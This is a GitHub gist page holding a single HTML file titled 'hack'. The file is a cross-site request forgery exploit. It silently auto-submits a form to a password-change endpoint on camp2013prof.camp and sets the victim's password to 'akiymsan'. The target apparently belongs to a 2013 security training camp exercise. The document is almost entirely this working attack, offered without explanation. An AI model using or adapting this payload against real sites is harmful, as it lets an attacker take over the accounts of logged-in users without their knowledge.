Skip to content

Instantly share code, notes, and snippets.

@akiym
Created August 16, 2013 13:55
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save akiym/6250163 to your computer and use it in GitHub Desktop.
Save akiym/6250163 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>hack</title>
</head>
<body>
<form action="http://camp2013prof.camp/menu.cgi?actionid=passchg" method="post">
<table border=0>
<tr><td>新パスワード:</td>
<td><input type="password" name="pass" value="akiymsan" size=50></td></tr>
<tr><td>新パスワード(確認):</td>
<td><input type="password" name="pass2" value="akiymsan" size=50></td></tr>
</table>
<input type="hidden" name="actionid" value="passchg2">
<input type="submit" value="変更">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment